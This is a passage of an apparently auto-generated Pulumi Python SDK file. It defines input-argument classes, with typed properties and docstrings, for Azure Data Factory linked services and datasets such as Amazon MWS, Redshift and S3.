'SapEccLinkedServiceArgs',
'SapEccResourceDatasetArgs',
'SapHanaLinkedServiceArgs',
'SecureStringArgs',
'SelfHostedIntegrationRuntimeArgs',
'ServiceNowLinkedServiceArgs',
'ServiceNowObjectDatasetArgs',
'SftpServerLinkedServiceArgs',
'ShopifyLinkedServiceArgs',
'ShopifyObjectDatasetArgs',
'SparkLinkedServiceArgs',
'SparkObjectDatasetArgs',
'SqlServerLinkedServiceArgs',
'SqlServerTableDatasetArgs',
'SquareLinkedServiceArgs',
'SquareObjectDatasetArgs',
'SybaseLinkedServiceArgs',
'TeradataLinkedServiceArgs',
'TextFormatArgs',
'TriggerPipelineReferenceArgs',
'TumblingWindowTriggerArgs',
'VerticaLinkedServiceArgs',
'VerticaTableDatasetArgs',
'WebAnonymousAuthenticationArgs',
'WebBasicAuthenticationArgs',
'WebClientCertificateAuthenticationArgs',
'WebLinkedServiceArgs',
'WebTableDatasetArgs',
'XeroLinkedServiceArgs',
'XeroObjectDatasetArgs',
'ZohoLinkedServiceArgs',
'ZohoObjectDatasetArgs',
]
@pulumi.input_type
class ActivityDependencyArgs:
def __init__(__self__, *,
activity: pulumi.Input[str],
dependency_conditions: pulumi.Input[Sequence[pulumi.Input[str]]]):
"""
Activity dependency information.
:param pulumi.Input[str] activity: Activity name.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dependency_conditions: Match-Condition for the dependency.
"""
pulumi.set(__self__, "activity", activity)
pulumi.set(__self__, "dependency_conditions", dependency_conditions)
@property
@pulumi.getter
def activity(self) -> pulumi.Input[str]:
"""
Activity name.
"""
return pulumi.get(self, "activity")
@activity.setter
def activity(self, value: pulumi.Input[str]):
pulumi.set(self, "activity", value)
@property
@pulumi.getter(name="dependencyConditions")
def dependency_conditions(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
Match-Condition for the dependency.
"""
return pulumi.get(self, "dependency_conditions")
@dependency_conditions.setter
def dependency_conditions(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "dependency_conditions", value)
@pulumi.input_type
class ActivityPolicyArgs:
def __init__(__self__, *,
retry: Optional[Any] = None,
retry_interval_in_seconds: Optional[pulumi.Input[int]] = None,
secure_output: Optional[pulumi.Input[bool]] = None,
timeout: Optional[Any] = None):
"""
Execution policy for an activity.
:param Any retry: Maximum ordinary retry attempts. Default is 0. Type: integer (or Expression with resultType integer), minimum: 0.
:param pulumi.Input[int] retry_interval_in_seconds: Interval between each retry attempt (in seconds). The default is 30 sec.
:param pulumi.Input[bool] secure_output: When set to true, Output from activity is considered as secure and will not be logged to monitoring.
:param Any timeout: Specifies the timeout for the activity to run. The default timeout is 7 days. Type: string (or Expression with resultType string), pattern: ((\d+)\.)?(\d\d):(60|([0-5][0-9])):(60|([0-5][0-9])).
"""
if retry is not None:
pulumi.set(__self__, "retry", retry)
if retry_interval_in_seconds is not None:
pulumi.set(__self__, "retry_interval_in_seconds", retry_interval_in_seconds)
if secure_output is not None:
pulumi.set(__self__, "secure_output", secure_output)
if timeout is not None:
pulumi.set(__self__, "timeout", timeout)
@property
@pulumi.getter
def retry(self) -> Optional[Any]:
"""
Maximum ordinary retry attempts. Default is 0. Type: integer (or Expression with resultType integer), minimum: 0.
"""
return pulumi.get(self, "retry")
@retry.setter
def retry(self, value: Optional[Any]):
pulumi.set(self, "retry", value)
@property
@pulumi.getter(name="retryIntervalInSeconds")
def retry_interval_in_seconds(self) -> Optional[pulumi.Input[int]]:
"""
Interval between each retry attempt (in seconds). The default is 30 sec.
"""
return pulumi.get(self, "retry_interval_in_seconds")
@retry_interval_in_seconds.setter
def retry_interval_in_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retry_interval_in_seconds", value)
@property
@pulumi.getter(name="secureOutput")
def secure_output(self) -> Optional[pulumi.Input[bool]]:
"""
When set to true, Output from activity is considered as secure and will not be logged to monitoring.
"""
return pulumi.get(self, "secure_output")
@secure_output.setter
def secure_output(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "secure_output", value)
@property
@pulumi.getter
def timeout(self) -> Optional[Any]:
"""
Specifies the timeout for the activity to run. The default timeout is 7 days. Type: string (or Expression with resultType string), pattern: ((\d+)\.)?(\d\d):(60|([0-5][0-9])):(60|([0-5][0-9])).
"""
return pulumi.get(self, "timeout")
@timeout.setter
def timeout(self, value: Optional[Any]):
pulumi.set(self, "timeout", value)
@pulumi.input_type
class AmazonMWSLinkedServiceArgs:
def __init__(__self__, *,
access_key_id: Any,
endpoint: Any,
marketplace_id: Any,
seller_id: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
mws_auth_token: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
secret_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Amazon Marketplace Web Service linked service.
:param Any access_key_id: The access key id used to access data.
:param Any endpoint: The endpoint of the Amazon MWS server, (i.e. mws.amazonservices.com)
:param Any marketplace_id: The Amazon Marketplace ID you want to retrieve data from. To retrieve data from multiple Marketplace IDs, separate them with a comma (,). (i.e. A2EUQ1WTGCTBG2)
:param Any seller_id: The Amazon seller ID.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] mws_auth_token: The Amazon MWS authentication token.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] secret_key: The secret key used to access data.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "access_key_id", access_key_id)
pulumi.set(__self__, "endpoint", endpoint)
pulumi.set(__self__, "marketplace_id", marketplace_id)
pulumi.set(__self__, "seller_id", seller_id)
pulumi.set(__self__, "type", 'AmazonMWS')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if mws_auth_token is not None:
pulumi.set(__self__, "mws_auth_token", mws_auth_token)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if secret_key is not None:
pulumi.set(__self__, "secret_key", secret_key)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter(name="accessKeyId")
def access_key_id(self) -> Any:
"""
The access key id used to access data.
"""
return pulumi.get(self, "access_key_id")
@access_key_id.setter
def access_key_id(self, value: Any):
pulumi.set(self, "access_key_id", value)
@property
@pulumi.getter
def endpoint(self) -> Any:
"""
The endpoint of the Amazon MWS server, (i.e. mws.amazonservices.com)
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Any):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter(name="marketplaceID")
def marketplace_id(self) -> Any:
"""
The Amazon Marketplace ID you want to retrieve data from. To retrieve data from multiple Marketplace IDs, separate them with a comma (,). (i.e. A2EUQ1WTGCTBG2)
"""
return pulumi.get(self, "marketplace_id")
@marketplace_id.setter
def marketplace_id(self, value: Any):
pulumi.set(self, "marketplace_id", value)
@property
@pulumi.getter(name="sellerID")
def seller_id(self) -> Any:
"""
The Amazon seller ID.
"""
return pulumi.get(self, "seller_id")
@seller_id.setter
def seller_id(self, value: Any):
pulumi.set(self, "seller_id", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="mwsAuthToken")
def mws_auth_token(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The Amazon MWS authentication token.
"""
return pulumi.get(self, "mws_auth_token")
@mws_auth_token.setter
def mws_auth_token(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "mws_auth_token", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="secretKey")
def secret_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The secret key used to access data.
"""
return pulumi.get(self, "secret_key")
@secret_key.setter
def secret_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "secret_key", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class AmazonMWSObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Amazon Marketplace Web Service dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'AmazonMWSObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class AmazonRedshiftLinkedServiceArgs:
def __init__(__self__, *,
database: Any,
server: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
username: Optional[Any] = None):
"""
Linked service for Amazon Redshift.
:param Any database: The database name of the Amazon Redshift source. Type: string (or Expression with resultType string).
:param Any server: The name of the Amazon Redshift server. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password of the Amazon Redshift source.
:param Any port: The TCP port number that the Amazon Redshift server uses to listen for client connections. The default value is 5439. Type: integer (or Expression with resultType integer).
:param Any username: The username of the Amazon Redshift source. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "database", database)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "type", 'AmazonRedshift')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def database(self) -> Any:
"""
The database name of the Amazon Redshift source. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: Any):
pulumi.set(self, "database", value)
@property
@pulumi.getter
def server(self) -> Any:
"""
The name of the Amazon Redshift server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: Any):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password of the Amazon Redshift source.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port number that the Amazon Redshift server uses to listen for client connections. The default value is 5439. Type: integer (or Expression with resultType integer).
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The username of the Amazon Redshift source. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class AmazonS3DatasetArgs:
def __init__(__self__, *,
bucket_name: Any,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
compression: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
format: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]] = None,
key: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
prefix: Optional[Any] = None,
structure: Optional[Any] = None,
version: Optional[Any] = None):
"""
A single Amazon Simple Storage Service (S3) object or a set of S3 objects.
:param Any bucket_name: The name of the Amazon S3 bucket. Type: string (or Expression with resultType string).
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']] compression: The data compression method used for the Amazon S3 object.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']] format: The format of files.
:param Any key: The key of the Amazon S3 object. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any prefix: The prefix filter for the S3 object name. Type: string (or Expression with resultType string).
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
:param Any version: The version for the S3 object. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "bucket_name", bucket_name)
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'AmazonS3Object')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if compression is not None:
pulumi.set(__self__, "compression", compression)
if description is not None:
pulumi.set(__self__, "description", description)
if format is not None:
pulumi.set(__self__, "format", format)
if key is not None:
pulumi.set(__self__, "key", key)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if prefix is not None:
pulumi.set(__self__, "prefix", prefix)
if structure is not None:
pulumi.set(__self__, "structure", structure)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter(name="bucketName")
def bucket_name(self) -> Any:
"""
The name of the Amazon S3 bucket. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "bucket_name")
@bucket_name.setter
def bucket_name(self, value: Any):
pulumi.set(self, "bucket_name", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def compression(self) -> Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]:
"""
The data compression method used for the Amazon S3 object.
"""
return pulumi.get(self, "compression")
@compression.setter
def compression(self, value: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]):
pulumi.set(self, "compression", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def format(self) -> Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]:
"""
The format of files.
"""
return pulumi.get(self, "format")
@format.setter
def format(self, value: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]):
pulumi.set(self, "format", value)
@property
@pulumi.getter
def key(self) -> Optional[Any]:
"""
The key of the Amazon S3 object. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[Any]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def prefix(self) -> Optional[Any]:
"""
The prefix filter for the S3 object name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "prefix")
@prefix.setter
def prefix(self, value: Optional[Any]):
pulumi.set(self, "prefix", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@property
@pulumi.getter
def version(self) -> Optional[Any]:
"""
The version for the S3 object. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[Any]):
pulumi.set(self, "version", value)
@pulumi.input_type
class AmazonS3LinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
access_key_id: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
secret_access_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None):
"""
Linked service for Amazon S3.
:param pulumi.Input[str] type: Type of linked service.
:param Any access_key_id: The access key identifier of the Amazon S3 Identity and Access Management (IAM) user. Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] secret_access_key: The secret access key of the Amazon S3 Identity and Access Management (IAM) user.
"""
pulumi.set(__self__, "type", 'AmazonS3')
if access_key_id is not None:
pulumi.set(__self__, "access_key_id", access_key_id)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if secret_access_key is not None:
pulumi.set(__self__, "secret_access_key", secret_access_key)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="accessKeyId")
def access_key_id(self) -> Optional[Any]:
"""
The access key identifier of the Amazon S3 Identity and Access Management (IAM) user. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "access_key_id")
@access_key_id.setter
def access_key_id(self, value: Optional[Any]):
pulumi.set(self, "access_key_id", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
